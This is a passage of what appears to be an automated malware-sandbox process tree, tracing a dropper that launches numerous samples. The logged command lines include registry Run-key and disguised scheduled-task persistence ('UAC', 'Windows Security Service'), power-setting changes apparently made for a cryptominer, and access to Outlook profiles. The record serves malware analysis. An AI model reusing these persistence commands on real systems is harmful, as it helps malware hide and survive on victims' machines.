        PID:5292
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        6⤵
        
        PID:3864
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        7⤵
        Kills process with taskkill
        
        PID:6812
      - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        6⤵
        
        PID:7472
      - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
        
        "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        
        PID:8312
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        7⤵
        
        PID:8408
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        8⤵
        Kills process with taskkill
        
        PID:8516
        
        C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        7⤵
        
        PID:1588
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        7⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        8⤵
        
        PID:8428
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8480
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        7⤵
        
        PID:1856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8488
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        7⤵
        Power Settings
        
        PID:7404
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:8608
        
        C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:8824
        
        C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        8⤵
        Power Settings
        
        PID:8900
    - - C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe
        
        "C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"
        5⤵
        
        PID:8684
      - C:\Users\Admin\AppData\Local\Temp\is-CQ3HF.tmp\Kerish_Doctor_2023.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CQ3HF.tmp\Kerish_Doctor_2023.tmp" /SL5="$E0534,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"
        6⤵
        
        PID:8728
    - - C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe
        
        "C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"
        5⤵
        
        PID:6504
      - C:\Users\Admin\AppData\Local\Temp\is-ATB8I.tmp\Kerish_Doctor_Windows_8.2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ATB8I.tmp\Kerish_Doctor_Windows_8.2.tmp" /SL5="$C0482,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"
        6⤵
        
        PID:3272
    - - C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.exe
        
        "C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.exe"
        5⤵
        
        PID:7560
      - C:\Users\Admin\AppData\Local\Temp\is-0971F.tmp\Kerish_Doctor_Windows_8.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-0971F.tmp\Kerish_Doctor_Windows_8.tmp" /SL5="$206E4,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.exe"
        6⤵
        
        PID:8908
    - - C:\Users\Admin\Desktop\a\seksiak.exe
        
        "C:\Users\Admin\Desktop\a\seksiak.exe"
        5⤵
        
        PID:6480
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8340
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\29uGi4NvTnBB.bat" "
        6⤵
        
        PID:8524
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:8088
    - - C:\Users\Admin\Desktop\a\2klz.exe
        
        "C:\Users\Admin\Desktop\a\2klz.exe"
        5⤵
        
        PID:8968
      - C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
        6⤵
        
        PID:7592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qF3T3UwyTT7b.bat" "
        7⤵
        
        PID:4408
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:8512
    - - C:\Users\Admin\Desktop\a\Test2.exe
        
        "C:\Users\Admin\Desktop\a\Test2.exe"
        5⤵
        
        PID:7188
      - C:\Users\Admin\Desktop\a\._cache_Test2.exe
        
        "C:\Users\Admin\Desktop\a\._cache_Test2.exe"
        6⤵
        
        PID:7704
    - - C:\Users\Admin\Desktop\a\OneDrive.exe
        
        "C:\Users\Admin\Desktop\a\OneDrive.exe"
        5⤵
        
        PID:7432
      - C:\Users\Admin\Desktop\a\._cache_OneDrive.exe
        
        "C:\Users\Admin\Desktop\a\._cache_OneDrive.exe"
        6⤵
        
        PID:8148
    - - C:\Users\Admin\Desktop\a\kthiokadjg.exe
        
        "C:\Users\Admin\Desktop\a\kthiokadjg.exe"
        5⤵
        
        PID:3328
    - - C:\Users\Admin\Desktop\a\jrockekcurje.exe
        
        "C:\Users\Admin\Desktop\a\jrockekcurje.exe"
        5⤵
        
        PID:5788
    - - C:\Users\Admin\Desktop\a\systempreter.exe
        
        "C:\Users\Admin\Desktop\a\systempreter.exe"
        5⤵
        
        PID:1108
    - - C:\Users\Admin\Desktop\a\image%20logger.exe
        
        "C:\Users\Admin\Desktop\a\image%20logger.exe"
        5⤵
        
        PID:6648
    - - C:\Users\Admin\Desktop\a\mode11_CBNx.exe
        
        "C:\Users\Admin\Desktop\a\mode11_CBNx.exe"
        5⤵
        
        PID:8200
    - - C:\Users\Admin\Desktop\a\daytjhasdawd.exe
        
        "C:\Users\Admin\Desktop\a\daytjhasdawd.exe"
        5⤵
        
        PID:3416
    - - C:\Users\Admin\Desktop\a\Java32.exe
        
        "C:\Users\Admin\Desktop\a\Java32.exe"
        5⤵
        
        PID:3500
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3228
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1388
  - - C:\Users\Admin\Desktop\a\gem1.exe
      "C:\Users\Admin\Desktop\a\gem1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        
        PID:928
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        
        PID:4256
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        
        PID:4512
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4784
    - - C:\Users\Admin\Desktop\a\gem1.exe
        
        "C:\Users\Admin\Desktop\a\gem1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4204
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 828
        5⤵
        Program crash
        
        PID:1380
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"
      4⤵
      PID:6956
    - - C:\Users\Admin\AppData\Local\Temp\is-GVJV1.tmp\Kerish_Doctor_2021.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-GVJV1.tmp\Kerish_Doctor_2021.tmp" /SL5="$50324,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2021.exe"
        5⤵
        
        PID:5372
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"
      4⤵
      PID:1600
    - - C:\Users\Admin\AppData\Local\Temp\is-AU5QC.tmp\Kerish_Doctor_Windows_XP.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AU5QC.tmp\Kerish_Doctor_Windows_XP.tmp" /SL5="$305D2,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_XP.exe"
        5⤵
        
        PID:1428
  - - C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_Vista.exe
      "C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_Vista.exe"
      4⤵
      PID:6644
    - - C:\Users\Admin\AppData\Local\Temp\is-S51RC.tmp\Kerish_Doctor_Windows_Vista.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S51RC.tmp\Kerish_Doctor_Windows_Vista.tmp" /SL5="$20792,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_Vista.exe"
        5⤵
        
        PID:8576
  - - C:\Users\Admin\Desktop\a\mode11_UVo6.exe
      "C:\Users\Admin\Desktop\a\mode11_UVo6.exe"
      4⤵
      PID:6356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff8d538cc40,0x7ff8d538cc4c,0x7ff8d538cc58
    3⤵
    PID:3016
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1800 /prefetch:2
    3⤵
    PID:4984
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1948,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:3
    3⤵
    PID:4916
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2196,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1740 /prefetch:8
    3⤵
    PID:3044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
    3⤵
    PID:1752
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
    3⤵
    PID:1144
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,10846539418807685465,5399449478930922616,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4432 /prefetch:1
    3⤵
    PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1380
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x110,0x114,0x118,0xe8,0x11c,0x7ff8d538cc40,0x7ff8d538cc4c,0x7ff8d538cc58
    3⤵
    PID:760
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1952 /prefetch:2
    3⤵
    PID:3732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1764,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2088 /prefetch:3
    3⤵
    PID:4272
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2076,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
    3⤵
    PID:3620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
    3⤵
    PID:2592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3324 /prefetch:1
    3⤵
    PID:3708
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4472 /prefetch:1
    3⤵
    PID:2368
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4668,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4788 /prefetch:8
    3⤵
    PID:1940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8
    3⤵
    PID:756
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3704,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
    3⤵
    PID:2664
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
    3⤵
    PID:3992
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
    3⤵
    PID:4068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4904,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:8
    3⤵
    PID:4360
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4792,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5264 /prefetch:2
    3⤵
    PID:5416
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
    3⤵
    - Drops file in Windows directory
    PID:5864
  - - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff655e94698,0x7ff655e946a4,0x7ff655e946b0
      4⤵
      Drops file in Windows directory
      PID:5888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5124,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5196 /prefetch:1
    3⤵
    PID:1672
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3448,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
    3⤵
    PID:5276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3412,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3384 /prefetch:1
    3⤵
    PID:2252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4952,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:1
    3⤵
    PID:6068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5624,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5612 /prefetch:8
    3⤵
    PID:1252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5132,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5744 /prefetch:8
    3⤵
    PID:5484
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5784,i,2151985103891782153,810968073341806124,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5752 /prefetch:8
    3⤵
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2496
  - - C:\Users\Admin\Desktop\New Text Document mod.exe
      "C:\Users\Admin\Desktop\New Text Document mod.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5252
    - - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
        
        "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
        5⤵
        Executes dropped EXE
        
        PID:1808
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5524
      - C:\Users\Admin\Desktop\a\TEST.exe
        
        "C:\Users\Admin\Desktop\a\TEST.exe"
        6⤵
        
        PID:8324
        
        C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe
        
        "TestResource/Launcher_Start.exe"
        7⤵
        
        PID:9000
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Launcher_Start.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=9000.3464.4974765364685607002
        8⤵
        
        PID:9168
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\Desktop\a\TestResource\Launcher_Start.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x128,0x12c,0x130,0x124,0x21c,0x7ff8da763cb8,0x7ff8da763cc8,0x7ff8da763cd8
        9⤵
        
        PID:8124
        
        C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
        
